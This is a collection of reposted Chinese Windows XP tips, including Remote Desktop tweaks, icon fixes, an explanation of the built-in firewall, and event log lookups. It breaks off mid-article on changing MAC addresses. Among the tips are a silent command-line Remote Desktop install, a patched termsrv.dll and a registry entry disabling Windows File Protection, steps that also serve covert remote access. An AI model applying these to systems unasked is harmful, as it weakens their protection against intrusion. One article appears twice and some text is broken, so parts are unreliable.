SP2中提供了允许连接会话并发功能，可通过远程桌面进行多用户的同时登录，但其在默认状态下关闭了该项特性，需要通过修改注册表开启该功能。 打开注册表编辑器，依次展开 “HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core”分支，转到右侧窗口，在其中新建一个类型为DWORD的子键，将该键命名为“EnableConcurrentSessions”，并将键值设置为“1”，即可开启多用户登录功能。 在远程桌面中传输文件 在进行远程桌面操作时，有时需要在远程服务器与本地计算机传输文件，这是很麻烦的事。其实在远程桌面程序中内置了映射磁盘的功能，通过该功能便可以实现远程登录服务器时，自动将本地计算机的磁盘映射到远程服务器上，让传送文件变得更加简单快捷。 在“远程桌面连接程序”中展开“选项”，选择“本地资源”标签，钩选中“磁盘驱动器”。连接到远程登录到服务器上后，打开服务器的“我的电脑”，就会发现本地计算机的磁盘以及软驱、光驱都映射到了服务器上，这样传送文件便可像操作本地硬盘一样方便了。 远程桌面中使用快捷键 在本地可使用快捷键，远程桌面上同样也可以通过快捷键方便操作，例如:+键可切换当前运行程序，+键可显示“开始”菜单，而++键可在窗口和全屏之间切换客户端，+键则可显示Windows菜单。 另外，可在“远程桌面连接”窗口中单击“选项”按钮，在“本地资源”选项卡下的“键盘”栏中，选择“应用 Windows 键组合”到“远程计算机上”。这样就可将对当前系统的所有Windows快捷键操作，都应用到远程计算机的桌面上，使操作更加得心应手。 修改远程桌面连接端口 远程桌面终端服务默认端口为“3389”，为防止他人进行恶意连接，就需要对默认端口进行更改。对此可打开注册表编辑器，依次展开 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp”分支，其下的“PortNumber”键值所对应的就是端口号，将其修改即可。上面设置完成后，需要再依次展开 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp”分支，同样将其下的“PortNumber”键值进行更改。 当更改了服务器的远程登录端口后，可在本地的“远程桌面连接程序”中设置连接的服务器地址，然后单击“连接设置?另存为”，导出并保存连接文件。然后用记事本打开导出的“*.rdp”文件，在其中添加语句“server port:i:端 口号”，保存后导入连接即可。要注意，在Windows 2000中导出的是“.cns”文件，可打开后在其中找到“Server Port =3389”语句，将其默认的“3389”端口修改为与服务器相同的登录端口。 命令行下安装远程桌面 如果系统中没有安装远程桌面服务，可使用命令行方式进行手工添加。只需打开命令提示符窗口，在命令行下输入如下三行命令: c:\>echo [Components] > c:\aa c:\>echo TSEnable = on >>c:\aa c:\>sysocmgr/i:c:\winnt\inf\sysoc.inf /u:c:\aa /q /r 执行后，即可完成远程桌面程序的安装。 Win XP双管理员同时登录 其实通过替换更改系统中的一个文件，Windows XP远程桌面也可以做到两个不同帐户管理员同时登录，二者互不相干、互不影响。这个文件就是位于系统文件夹下的termsrv.dll。 提示:开启Windows XP的远程桌面方法:右击桌面“我的电脑”图标，选择“属性”，在弹出的“系统属性”窗口中，切换到“远程”选项卡，勾选“允许用户远程连接到此计算机”项，确定即可。 从,,。(对于Windows XP SP2还必须替换C:\WINDOWS\$NtServicePackUninstall$和 C:\WINDOWS\ServicePackFiles\i386目录下的同名文件)。 替换后正常登录系统，还必须禁止SFC(Windows系统文件保护功能)，否则将会有出“Windows文件保护”提示。只需将以下内容保存为reg文件导入注册表中即可: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "SFCDisable"=dword:ffffff9d 接着要开启远程桌面的多用户功能，将以下内容保存为reg文件并导入注册表中即可: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Licensing Core] "EnableConcurrentSessions"=dword:00000001 如果开启了Windows XP SP2的防火墙，还必须允许通过3389端口进行连接。具体方法是:依次打开“网上邻居”?“查看网络连接”，点击左上栏中的 “更改Windows防火墙设置”，在弹出的“Windows防火墙”窗口中，切换到“例外”选项卡，点击“添加端口”按钮，在接下来的窗口中，输入“名称”(可随意命名)和“端口号”:3389，确定即可。 对于内网用户，还必须作端口映射，外网的机子才能得以顺利连接。关于端口映射的具体操作方法可参考以前的X档案，不再赘述。 这样，当两个不同帐号的管理员同时登录某台计算机，你会发现他(她)们之间可以通过任务栏右键菜单中的“任务管理器”?“发送消息”来互通消息，方便极了!如果要“来无影，去无踪”，则必须运行“logoff”命令来注销。这样本地用户关机或重启时就不会出现“其他用户登录到这台计算机，关闭Windows 会使他们丢失数据。您要继续关机吗?”的提示 Windows系统桌面图标八大故障解决方法 2009-02-08 15:39:50 被50人转藏 | 小贴士:教你把口袋放到自己的桌面上吧! 天天用电脑，自然少不了出现这样那样的故障。对于一些电脑高手来说，解决这些故障是比较容易的，但是对与新手而言，当出现问题的时候，往往就不知道怎么办了，下面我们就讲讲系统图标出现故障后应该怎么办, 症状一:“网络连接”窗口中我的“本地连接”和“ADSL”图标不见了, 这可能是你的Network Connections服务被禁用了原因造成的，查看方法如下:在“运行”窗口中输入“services.msc”，然后在打开的“服务”窗口右侧服务列表中找到名称为“Network Connections”的服务，看看其状态是否为“已启动”。如果不是，那么就需要将其设置为“已启动”。 症状二:任务栏按钮突然消失了, 不知道大家有没有遇到这样的情况，在Windows 98中上网时，如果打开的IE窗口过多时，任务栏的按钮会被挤的很小，甚至有时都看不到按钮上的文字了。但是在Windows XP中如果你打开的窗口过多时，你会发现这些密密麻麻的按钮突然一下减少了许多，这是怎么回事呢,突然消失的那些按钮到哪去了呢, 其实这是Windows XP的一项功能而已。这个功能叫“分组相似的任务栏按钮”，当任务栏按钮过多时，它会把同一类按钮分组集合在一个按钮上，以便精简任务栏。要恢复显示这些被藏起来的任务栏按钮，我们可以用鼠标右键单击开始按钮，选择属性选项，在任务栏选项卡中的“任务栏外观”里去掉“分组类似任务栏按钮”选项前的勾就行了。 症状三:工作列的按钮不见了, 我是使用Windows XP的系统，一般开启窗口后应该都会在底下的工作列再出现各自的按钮，不知道什么原因，在一次开机后就不再出现按钮了，只留下之前设定的工具列，找了很久也没发现那里可以改变设定，现在要切换窗口只得靠Alt + Tab键，实在很麻烦，快帮帮我吧～～ 使用Administrator的帐号进入Windows XP后，把工作列不见的那个帐号删除，再建立一个新的帐号，名称可以相同。 症状四:Windows XP桌面的图标不见了, 开机进到桌面后，桌面所有东西都不见了，但能从工作管理员去执行程序，请问是啥问题,是中毒吗, Windows XP有一个功能，就是把桌面上的图标隐藏～所以可能是无意中改动了这个选项的设定，只要在桌面展开右键，选择“依次排列图标”,“显示桌面图标”就可以了:) 症状五:桌面上的IE图标竟然不见了, 在桌面单击右键，选“属性?桌面?自定义桌面”，在桌面图标处看到“Internet Explorer”项了吧，选择上它桌面就可以恢复IE图标了。 症状六:USB接口闪存盘图标就找不到了, 我的电脑中使用的是Windows 2000操作系统，有时在强行关闭一些程序之后，发现桌面右下角小托盘上会丢失一些图标，比如说连接在电脑上的USB接口闪存盘图标就找不到了，这样就无法用鼠标单击图标而后正常的关闭闪存盘，但如果直接拔下，系统会出现警告性提示，有时候闪存盘内的的文件还会因此而损坏， 请问有什么办法能在闪存盘图标丢失的情况下也能关闭闪存盘，使之能够正常的拔下, 你可以通过Windows 2000操作系统中提供的“添加,删除硬件”的方法来达到目的，具体的操作步骤如下: 1.在系统桌面上用鼠标依次单击选择“开始?设置?控制面板”。 2.在随后出现的窗口中双击“添加,删除硬件”图标，在随后出现的“添加,删除硬件向导”窗口中单击“下一步”按钮。 3.接着在出现的窗口选中“卸掉,拔掉设备”选项，然后单击“下一步”按钮。 4.再在弹出的窗口中选中“拔出,弹出设备”选项，然后单击“下一步”按钮。 5.在“硬件设备”框中选中“USB Mass Storage Device”项并单击“下一步” 按钮。 6.接着再选中“USB Mass Storage Device”项并单击“下一步”按钮。 7.最后单击“完成”按钮即可。 症状七:控制音量的小喇叭图标不见了, 出现这种情况，只要打开,控制面板,，选择,声音、语言和音频设备,这一项，再选择,声音和音频设备,，然后再打开窗口的,音量,选项，在,将音量图标放入任务栏,选项前面打上钩，单击,确定,，图标便会出现了。 症状八:我的输入法图标哪儿去了,怎么办, 如果你用的还是Windows 98、Windows Me的系统，有时输入法图标不见了，一般可以在输入法设置中找回来。依次单击“开始”?“设置”?“控制面板”，打开控制面板，在控制面板中双击“输入法”图标，在弹出的对话框下部，有一个“启动任务栏上的指示器”的选项，看看它前面的选择框内有没有一个对勾，没有就选上，然后用鼠标单击下方的“确定”按钮，输入法图标就会失而复得了。 如果你用的是Windows XP中，输入法图标也会莫名其妙地丢失，但在控制面板中却没有“输入法”，这时可以按以下方法尝试: 方法1:在任务栏单击鼠标右键，弹出快捷菜单，把鼠标移动到“工具栏”上，会弹出子菜单，看看其中的“语言栏”有没有被选中，如果没有选中，单击选中“语言栏”，一般会显示输入法图标。 方法2:依次单击“开始?设置?控制面板”，打开控制面板，在控制面板中单 击“日期、时间、语言和区域设置”，单击“语言和区域设置”，弹出“语言和区域设置”对话框，单击“语言”标签，在“文字服务和输入语言”下单击“详细信息”按钮，弹出“文字服务和输入语言”对话框，单击“高级”标签，在“系统配置”下，把“关闭高级文字服务”前面的对号取消，单击“确定”按钮，输入法图标就回来了。 方法3:点“开始?运行”，键入“msconfig”，单击“确定”或回车，运行“系统配置实用程序”，在“启动”里把“Ctfmon.exe”选中，单击“确定”，然后注销或重新启动应该就可以了。这是因为Ctfmon.exe控制Alternative User Input Text Processor (TIP)和Microsoft Office语言条，提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。这个程序没有启动也会造成输入法图标不显示。 最后提示一下，没有输入法图标，用快捷键一样可以操作输入法。Ctrl+Space(空格键)是在中、英文输入法之间切换;按Ctrl+Shift组合键可以依次显示 系统安装的输入法。 Windows系统桌面图标八大故障解决方法 2009-02-08 15:39:50 被50人转藏 | 小贴士:教你把口袋放到自己的桌面上吧! 天天用电脑，自然少不了出现这样那样的故障。对于一些电脑高手来说，解决这些故障是比较容易的，但是对与新手而言，当出现问题的时候，往往就不知道怎么办了，下面我们就讲讲系统图标出现故障后应该怎么办, 症状一:“网络连接”窗口中我的“本地连接”和“ADSL”图标不见了, 这可能是你的Network Connections服务被禁用了原因造成的，查看方法如下:在“运行”窗口中输入“services.msc”，然后在打开的“服务”窗口右侧服务列表中找到名称为“Network Connections”的服务，看看其状态是否为“已启动”。如果不是，那么就需要将其设置为“已启动”。 症状二:任务栏按钮突然消失了, 不知道大家有没有遇到这样的情况，在Windows 98中上网时，如果打开的IE窗口过多时，任务栏的按钮会被挤的很小，甚至有时都看不到按钮上的文字了。但是在Windows XP中如果你打开的窗口过多时，你会发现这些密密麻麻的按钮 突然一下减少了许多，这是怎么回事呢,突然消失的那些按钮到哪去了呢, 其实这是Windows XP的一项功能而已。这个功能叫“分组相似的任务栏按钮”，当任务栏按钮过多时，它会把同一类按钮分组集合在一个按钮上，以便精简任务栏。要恢复显示这些被藏起来的任务栏按钮，我们可以用鼠标右键单击开始按钮，选择属性选项，在任务栏选项卡中的“任务栏外观”里去掉“分组类似任务栏按钮”选项前的勾就行了。 症状三:工作列的按钮不见了, 我是使用Windows XP的系统，一般开启窗口后应该都会在底下的工作列再出现各自的按钮，不知道什么原因，在一次开机后就不再出现按钮了，只留下之前设定的工具列，找了很久也没发现那里可以改变设定，现在要切换窗口只得靠Alt + Tab键，实在很麻烦，快帮帮我吧～～ 使用Administrator的帐号进入Windows XP后，把工作列不见的那个帐号删除，再建立一个新的帐号，名称可以相同。 症状四:Windows XP桌面的图标不见了, 开机进到桌面后，桌面所有东西都不见了，但能从工作管理员去执行程序，请问是啥问题,是中毒吗, Windows XP有一个功能，就是把桌面上的图标隐藏～所以可能是无意中改动了这个选项的设定，只要在桌面展开右键，选择“依次排列图标”,“显示桌面图标”就可以了:) 症状五:桌面上的IE图标竟然不见了, 在桌面单击右键，选“属性?桌面?自定义桌面”，在桌面图标处看到“Internet Explorer”项了吧，选择上它桌面就可以恢复IE图标了。 症状六:USB接口闪存盘图标就找不到了, 我的电脑中使用的是Windows 2000操作系统，有时在强行关闭一些程序之后，发现桌面右下角小托盘上会丢失一些图标，比如说连接在电脑上的USB接口闪存盘图标就找不到了，这样就无法用鼠标单击图标而后正常的关闭闪存盘，但如果直接拔下，系统会出现警告性提示，有时候闪存盘内的的文件还会因此而损坏，请问有什么办法能在闪存盘图标丢失的情况下也能关闭闪存盘，使之能够正常的拔下, 你可以通过Windows 2000操作系统中提供的“添加,删除硬件”的方法来达到目的，具体的操作步骤如下: 1.在系统桌面上用鼠标依次单击选择“开始?设置?控制面板”。 2.在随后出现的窗口中双击“添加,删除硬件”图标，在随后出现的“添加,删除硬件向导”窗口中单击“下一步”按钮。 3.接着在出现的窗口选中“卸掉,拔掉设备”选项，然后单击“下一步”按钮。 4.再在弹出的窗口中选中“拔出,弹出设备”选项，然后单击“下一步”按钮。 5.在“硬件设备”框中选中“USB Mass Storage Device”项并单击“下一步” 按钮。 6.接着再选中“USB Mass Storage Device”项并单击“下一步”按钮。 7.最后单击“完成”按钮即可。 症状七:控制音量的小喇叭图标不见了, 出现这种情况，只要打开,控制面板,，选择,声音、语言和音频设备,这一项，再选择,声音和音频设备,，然后再打开窗口的,音量,选项，在,将音量图标放入任务栏,选项前面打上钩，单击,确定,，图标便会出现了。 症状八:我的输入法图标哪儿去了,怎么办, 如果你用的还是Windows 98、Windows Me的系统，有时输入法图标不见了，一般可以在输入法设置中找回来。依次单击“开始”?“设置”?“控制面板”，打开控制面板，在控制面板中双击“输入法”图标，在弹出的对话框下部，有一个“启动任务栏上的指示器”的选项，看看它前面的选择框内有没有一个对勾，没有就选上，然后用鼠标单击下方的“确定”按钮，输入法图标就会失而复得了。 如果你用的是Windows XP中，输入法图标也会莫名其妙地丢失，但在控制面板中却没有“输入法”，这时可以按以下方法尝试: 方法1:在任务栏单击鼠标右键，弹出快捷菜单，把鼠标移动到“工具栏”上，会弹出子菜单，看看其中的“语言栏”有没有被选中，如果没有选中，单击选中“语言栏”，一般会显示输入法图标。 方法2:依次单击“开始?设置?控制面板”，打开控制面板，在控制面板中单击“日期、时间、语言和区域设置”，单击“语言和区域设置”，弹出“语言和区域设置”对话框，单击“语言”标签，在“文字服务和输入语言”下单击“详细信息”按钮，弹出“文字服务和输入语言”对话框，单击“高级”标签，在“系统配置”下，把“关闭高级文字服务”前面的对号取消，单击“确定”按钮，输入法图标就回来了。 方法3:点“开始?运行”，键入“msconfig”，单击“确定”或回车，运行“系统配置实用程序”，在“启动”里把“Ctfmon.exe”选中，单击“确定”，然后注销或重新启动应该就可以了。这是因为Ctfmon.exe控制Alternative User Input Text Processor (TIP)和Microsoft Office语言条，提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。这个程序没有启动也会造成输入法图标不显示。 最后提示一下，没有输入法图标，用快捷键一样可以操作输入法。Ctrl+Space(空格键)是在中、英文输入法之间切换;按Ctrl+Shift组合键可以依次显示 系统安装的输入法。 内置于Windows XP的防火墙ICF的应用 2009-02-08 15:38:47 被20人转藏 | 小贴士:不得不说的话题:女性身体探秘! ICF是"Internet Connection Firewall"的简称，也就是因特网连接防火墙。ICF建立在你的电脑与因特网之间，它可以让你请求的数据通过、而阻碍你没有请求的数据包，是一个基于包的防火墙。所以，ICF的第一个功能就是不响应Ping命令，而且，ICF还禁止外部程序对本机进行端口扫描，抛弃所有没有请求的IP包。 个人电脑同服务器不一样，一般不会提供诸如Ftp、Telnet、POP3等服务，这样可以被黑客们利用的系统漏洞就很少。所以，ICF可以在一定的程度上很好地保护我们的个人电脑。 ICF是状态防火墙，可监视通过的所有通讯，并且检查所处理的每个消息的源和目标地址。为了防止未经请求的通信进入系统端口，ICF保留了所有源自本地计算机的通讯表。在单独的计算机中，ICF将跟踪源自本地计算机的通信，所有Internet传入通信都会针对于该表中的各项进行比较。只有当通讯表中有匹配项时(这说明通讯交换是从计算机或专用网络内部开始的)，才允许将传入Internet通信传送给网络中的计算机。 源自外部ICF计算机(也就是入侵计算机)的通讯(如Internet非法访问)将被防火墙阻止，除非在"服务"选项卡上设置允许该通讯通过。ICF不会向你发送活动通知，而是静态地阻止未经请求的通讯，防止像端口扫描这样的常见黑客袭击。 ICF的原理是通过保存一个通讯表格，记录所有自本机发出的目的IP地址、端口、服务以及其他一些数据来达到保护本机的目的。 当一个IP数据包进入本机时，ICF会检查这个表格，看到达的这个IP数据包是不是本机所请求的，如果是就让它通过，如果在那个表格中没有找到相应的记录就抛弃这个IP数据包。 下面的例子可以很好地说明这个原理。当用户使用Outlook Express来收发电子邮件的时侯，本地个人机发出一个IP请求到POP3邮件服务器。ICF会记录这个目的IP地址、端口。当一个IP数据包到达本机的时候，ICF首先会进行审核，通过查找事先记录的数据可以确定这个IP数据包是来自我们请求的目的地址和端口，于是这个数据包获得通过。来看一下当使用Outlook Express客户端邮件程序和邮件服务器时的情况。一旦有新的邮件到达邮件服务器时，邮件服务器会自动发一个IP数据包到Outlook客户机来通知有新的邮件到达。这种通知是通过RPC Call来实现的。当邮件服务器的IP数据包到达客户机时，客户机的ICF程序就会对这个IP包进行审核发现本机的Outlook express客户端软件曾发出过对这个地址和端口发出IP请求，所以这个IP包就会被接受，客户机当然就会收到发自邮件服务器的新邮件通知。然后让Outlook Express去接收邮件服务器上的新邮件。 设置ICF 1、启用或禁用Internet连接防火墙 打开"控制面板"中的"网络连接"，单击要保护的拨号、本地连接或其它Internet连接，然后在"网络任务"?"更改该连接的设置"?"高级"?"Internet 连接防火墙"下，选中“通过限制或阻止来自。。。”项目: 若要启用Internet连接防火墙，选中"通过限制或阻止来自Internet的对此计算机的访问来保护我的计算机和网络"复选框。若要禁用Internet连接防火墙，清除该复选框。 网络服务 还是上面的"高级"选项卡，点击下方的"设置"项: 已经有选中的项目表示网络用户能够存取的服务，如:messenger，远程桌面，FTP，Telnet等。对于一些常见的网络服务，如POP3，SMTP、HTTP等，系统会在需要的时候开放。如果我们要设置一个新的服务项目，以常见的messenger文件传输为例，因为许多朋友都会在这方面遇到问题，实际上在HELP中写的明白。messenger的文件传输采用TCP6891-6900端口，可以在xp的防火墙设置里面增加TCP6891号端口，文件就可以顺利发送了。文件传输的进程，一般情况下我们添加一个就行了。添加方法为: 按要求依次写入"描述"，"本机的IP地址"，使用的端口号(假设为6891)，然后确定即可。 安全日志 生成安全日志时使用的格式是W3C扩展日志文件格式，这与在常用日志分析工具中使用的格式类似。 打开"网络连接"，单击要在其上启用Internet连接防火墙(ICF)的连接，然后在"网络任务"?"更改该连接的设置"?"高级"?"设置"?"安全日志记录"?"记录选项"下，选择下面的一项或两项: “记录成功的连接” “记录被丢弃的包” 若要启用对不成功的入站连接尝试的记录，请选中"记录丢弃的数据包"复选框，否则禁用。 2、更改安全日志文件的路径和文件名 打开"网络连接"，选择要在其上启用Internet连接防火墙的连接，然后在"网络任务"?"更改该连接的设置"?"高级"?"设置"?"安全日志记录"?"日志文件选项"?"浏览"中，浏览要放置日志文件的位置。在"文件名"中，键入新的日志文件名，然后单击"打开"。打开后可查看其内容。还可以设置安全日志文件的大小，打开已启用Internet连接防火墙的连接，然后在"网络任务"?"更改该连接的设置"?"高级"?"设置"?"安全日志记录"?"日志文件选项"?"大小限制"中，使用箭头按钮调整大小限制。笔者认为，一般512K足够了。 如果你在更改设置后有问题，可以还原默认的安全日志设置。打开启用Internet连接防火墙的连接，然后点击"网络任务"?"更改该连接的设置"?"高级"?"设置"?"安全日志记录"?"还原默认值"。 记录成功的连接--这将登录来源于家庭、小型办公网络或Internet的所有成功的连接。 当你选择"登录成功的外传连接"复选框时，将收集每个成功通过防火墙的连接信息。例如，当网络上的任何人使用Internet Explorer成功实现与某个网站的连接时，日志中将生成一条项目。 记录放弃的数据包--这将登录来源于家庭、小型办公网络或Internet的所有放弃的数据包。 当你选择"登录放弃的数据包"复选框时，每次通信尝试通过防火墙却被检测和拒绝的信息都被ICF收集。例如，如果你的Internet控制消息没有设置成允许传入的回显请求，如Ping和Tracert命令发出的请求，则将接收到来自网络外的回显请求，回显请求将被放弃，然后日志中将生成一条项目。 Internet控制消息协议(ICMP) "网络消息协议(ICMP)"是所需的TCP/IP标准，通过ICMP，使用IP通讯的主机和路由器可以报告错误并交换受限控制和状态信息。 在下列情况中，通常自动发送ICM消息: IP数据报无法访问目标。 IP路由器(网关)无法按当前的传输速率转发数据报。 IP路由器将发送主机重定向为使用更好的到达目标的路由。 应用Internet控制消息协议: 打开"网络连接"。 单击已启用Internet连接防火墙的连接，在"网络任务"?"更改该连接的设置"?单击"高级"?"设置"?"ICMP"选项卡上，选中希望你的计算机响应的请求信息类型旁边的复选框。 ICF的局限性 那么，ICF不能做什么,ICF可不可以完全替代现有的个人防火墙产品,ICF是通过记录本机的IP请求来确定外来的IP数据包是不是"合法"，这当然不可以用在服务器上。为什么呢,服务器上的IP数据包基本上都不是由服务器先发出，所以ICF这种方法根本就不可以对服务器的安全提供保护。当然你也可以通过相应的设置让ICF忽略所有发向某一端口的数据包，例如80端口。那么发向80端口的所有数据包都不会被ICF抛弃。从这种意义上讲80端口就成为不设防的端口。这样的防火墙产品是不可能用在应用服务器上的，服务器上的防火墙产品都是基于建立各种策略来审核外来的IP数据包。ICF和基于应用程序的个人防火墙产品也是不一样的。基于应用程序的个人防火墙会记录每一个访问Internet的程序，例如，通过设置可以让IE有权来访问Internet而Netscape的Navigator没有权限来访问Internet，即便两个程序的目的IP地址和端口都是一样的。Norton的个人防火墙(Personal Firewall)就是这样一个典型的产品。简而言之，ICF没法提供基于应用程序的保护，也没法建立基于IP包的包审核策略。所以，ICF既不能完全替代现有的个人防火墙产品，也没有办法很好地工作在应用服务器上。 笔者认为，Norton的个人防火墙和Zonealarm Pro可以提供较全方面的保护，但设置较为复杂。ICF并不能提供完全无懈可击的防护，但是ICF对个人电脑提供防护是足够的。在使用一些系统安全软件对装有ICF的个人电脑进行端口扫描后，常会给出了"系统安全"的评价。况且，ICF是Windows XP内建的功能，占用的资源相当少且不用花额外的钱去购买。从ICF受益最多的应该是那些仍然在使用Modem上网的朋友，在国内绝大部分的用户都是用Modem上网的。首先，你上网的时间不会太长，一般在几小时上下(包月的除外)。其次，每次建立连接后拨号服务器都会分配一个新的IP地址(动态地址分配)给你，长时间占用一个相同的IP的可能性应该很低。比起使用ADSL和其它宽带的用户来讲，用Modem上网本身就安全了很多。 注意事项 ICF和家庭或小型办公室通讯--不应该在所有没有直接连接到Internet的连接上启用Internet连接防火墙，也就是最好不要在局域网中使用。如果在ICF客户计算机的网络适配器上启用防火墙，则它将干扰该计算机和网络上的其他计算机之间的一些通讯。如果网络已经具有互联网防火墙或代理服务器，则不需要Internet连接防火墙，你应该关闭它。 所以，使用一个重量级的防火墙实在是没有太多的意义。而ICF则刚刚好， 它既提供了一定的保护，而且又不太占用资源，经济实惠。 在Windows XP中查看计算机开关机记录 2009-02-08 15:38:08 被23人转藏 | 小贴士:测试:你对别人的重要性和利用率 在Windows XP中，我们可以通过“事件查看器”的事件日志服务查看计算机的开、关机时间。因为事件日志服务会随计算机一起启动和关闭，并在事件日志中留下记录。 在这里有必要介绍两个ID号:6006和6005。在事件查看器里ID号为6006的事件表示事件日志服务已停止，如果你没有在当天的事件查看器中发现这个ID号为6006的事件，那么就表示计算机没有正常关机，可能是因为系统原因或者直接按下了计算机电源键，没有执行正常的关机操作造成的。当你启动系统的时候，事件查看器的事件日志服务就会启动，这就是ID号为6005的事件。 通过这两个ID号保存的信息，我们可以轻松查看计算机开、关机记录:打开“控制面板”，双击“管理工具”，然后打开“事件查看器”，在左边的窗口中选择“系统”选项。单击鼠标右键，在弹出的快捷菜单中选择“属性”，在打开的“系统属性”窗口中选择“筛选器”选项卡，在“事件类型”下面选中“信息”复选项，并在“事件来源”列表中选择“eventlog”选项，继续设定其他条件后，单击“确定”按钮，即可看到需要的事件记录了。双击某条记录，如果描述信息为“事件服务已启动”，那就代表计算机开机或重新启动的时间，如果描述信息是“事件服务已停止”，即代表计算机的关机时间。 文件关联的应用 1.这个文件该用什么程序打开, 如果你不知道doc后缀的文件类型用什么程序打开，可以访问,询的扩展名。 2.如何定制相关联的自动运行(Windows XP) 在Windows XP中，有一些文件类型和程序关联得非常紧密，这些文件包括图片、视频或者音频文件等。就拿图片文件来说，每当你选中这些文件时，Windows XP可不管你平常习惯用什么程序(比如ACDSee)，它一律会使用自己的图片和传真查看器打开。这是什么在作怪, 打开“注册表编辑器”，你会找到下面的一些项目: HKEY_CLASSES_ROOT\SystemFileAssociations\audio\ShellEx\ContextMenuHan dlers\WMPAddToPlaylist HKEY_CLASSES_ROOT\SystemFileAssociations\image\ShellEx\ContextMenuHan dlers\ShellImagePreview HKEY_CLASSES_ROOT\SystemFileAssociations\video\shellex\ContextMenuHan dlers\WMPAddToPlaylist 正是诸如此类的项目影响了你的习惯，现在的办法就是把它们统统删除～ 3.双击可执行文件(.exe)后提示没有相关联的程序 Windows 2000/XP:双击“我的电脑”打开“资源管理器”，点击“工具?文件夹选项”，点击“文件类型”选项卡，然后点击“新建”按钮，在文件扩展名处输入“.exe”(不包括引号)，然后点击“高级”按钮，在“关联的文件类型”处选择“应用程序”，然后点击“确定”。 Windows 98:点击“开始?运行”，输入winfile.exe，按回车后会出现一个“文件管理器”的程序，在“文件”菜单下选择“关联”命令，会出现“关联”的对话框，在扩展名中输入文件的扩展名，再选定关联的程序，就可以非常简单地实现文件的关联了。 4.恢复Windows默认的文件关联 点击“开始?运行”，分别输入: rundll setupx.dll,InstallHinfSection DefaultInstall 132 c:\windows\inf\shell.inf regsvr32.exe /i shdocvw.dll regsvr32 /i shell32.dll regsvr32.exe /i shdoc401.dll 在Windows XP下如何运行UCDOS, 问:在 WindowsXP下,运行UCDOS出现花屏和乱码,如何解决, 答:UCDOS 是16位汉字系统，与WinXP存在兼容性问题。如果一定要用，可以采取一些措施，有望继续使用。 方法一 使用command.com 命令 1.在桌面空白处右击并选择"新建"-> "快捷方式"，在"请键入项目的位置"后面输入:command.com /k c:\ucdos\ucdos.bat 单击"下一步"，将该快捷方式的名称改为"UCDOS"，单击"完成"。 2.再次右击该快捷方式，选择"属性"，将"内存"改为"自动"，"屏幕"改为"全屏幕"，其他属性用默认值即可。 方法二 使用cmd.exe 命令 1. 将UCDOS的核心文件进行兼容性设置。 开始->所有程序->附件->程序兼容性向导->我想手动定位程序->浏览->\ucdos\knl.com->win98->256色,640X480->程序工作正确吗,是，设置此程序为一直使用兼容性设置。...完成。 有的UCDOS版本的核心文件是 knlvga.exe ,也要照此进行兼容性设置。 2. 运行 UCDOS 系统文件的方法。 进入到命令提示符(MS-DOS 状态)，切换到 UCDOS 目录。这时不要运行 UCDOS.BAT 。可以分别一项一项命令运行。如:RD16.COM，KNL.COM，PY.COM，RDFNT.COM。有的版本运行的次序是:(和中文之星双拼输入法兼容的版本) RD16.COM，KNLVGA.EXE，PY.COM，RDFNT.COM 3. 如果出现花屏和乱码，可以按 CTRL+ALT+DEL 就返回并进入任务管理器。选“应用程序->结束”就可以恢复正常。 4. 原来 UCDOS 下的各种汉字应用系统，如: FOXBASE,QBASIC,GWBASIC,MASM,BorlandC等，在 Win98 的 MS-DOS下能正常运行的系统，都可以继续使用。 5. 改进 ucdos.bat 分项命令执行的办法。 ucdos.bat 改为 分项命令执行，不便记忆，改进如下: (1) copy rd16.com uc1.com (2) copy knl.com uc2.com (3) 建立 uc3.bat 内容只有2行: py.com rdfnt.com (4) 运行时，连续执行: uc1 , uc2 , uc3 就可以顺利进入 ucdos . UCDOS 这样用，可以正常运行。但那么多的应用系统都支持32位，因而不存在兼容性问题，要是UCDOS 核心程序，也支持32位就好了。我们寄希望于UCDOS的开发者和有志之士。 找回Windows XP中的“Administrator”账户 在Windows XP下，如果建立了一个新的非受限者用户(计算机管理员)，下次登录计算机时，将不会出现Administrator超级用户的登录入口了。尽管当前有一个管理员用户(如“123”)，但在某些情况下，我们必须使用Administrator账户登录怎么办,让我们把它找回来。 首先以现有的计算机管理员的账户(如“123”)登录，然后打开“控制面板”，在“分类”视图下，依次单击“性能和维护?管理工具?计算机管理”(如果在“经典视图”下，直接在“控制面板”窗口中找到“管理工具”后双击，再找“计算机管理”)，双击“计算机管理”。看到了吗,Administrator账户在这儿呢。再双击“本地用户和组”，然后单击“用户”。将右边的“123”账户(即当前的计算机管理员账户)停用或者删除(删除当前账户时会有一个警告信息，点击“是”就可以了)。禁用后的“123”账户前应该有个红色的叉号。这样就会又以Administrator账户登录了。 强行关闭WinXP系统一法 我们在关闭计算机的时候，如果有程序未退出，则系统会弹出对话框，提醒某个程序仍在运行，是否结束任务。如果你不想每次都去按“是”来结束程序的运行，可修改注册表，让Windows自动结束这些仍在运行的程序，从而达到强制关闭系统的目的。 打开记事本，输入以下内容: Windows Registry Editor Version 5.00 [HKEY CURRENT USERControl Paneldesktop] "AutoEndTasks"="1" "WaitToKillApptimeout"="5000" 注意:这里的“AutoEndTasks”的字符串值为“1”，“WaitToKillAppTimeout”的字符串值为“5000”，表示在5000毫秒(即5秒，系统默认为20秒)之后，系统关闭正在运行的程序。 将编辑好的文件另存为“autoend.reg”(其它的文件名也可以，但是扩展名必须是.reg)。然后双击autoend.reg文件，会弹出对话框，提示你是否将autoend.reg添加到注册表，选择“是”导入注册表。重新启动电脑，即可使修 改生效。 两种修改网卡物理地址的方法 2009-02-08 15:37:28 被24人转藏 | 小贴士:收藏帖子也能赚钱?太好了! 如果您是通过网卡的物理地址进行访问网络的，那么一定会碰到需要修改物理地址的情况。如更换新网卡，网卡的物理地址重复或者让笔记本电脑临时登陆一下网络等情况。更改网卡MAC地址的文章网络中有很多，但大都说的不够详细，下面笔者试着以Windows XP操作系统为例介绍两种网卡MAC地址的修改方法，希望对大家有所帮助。 简单的修改方法 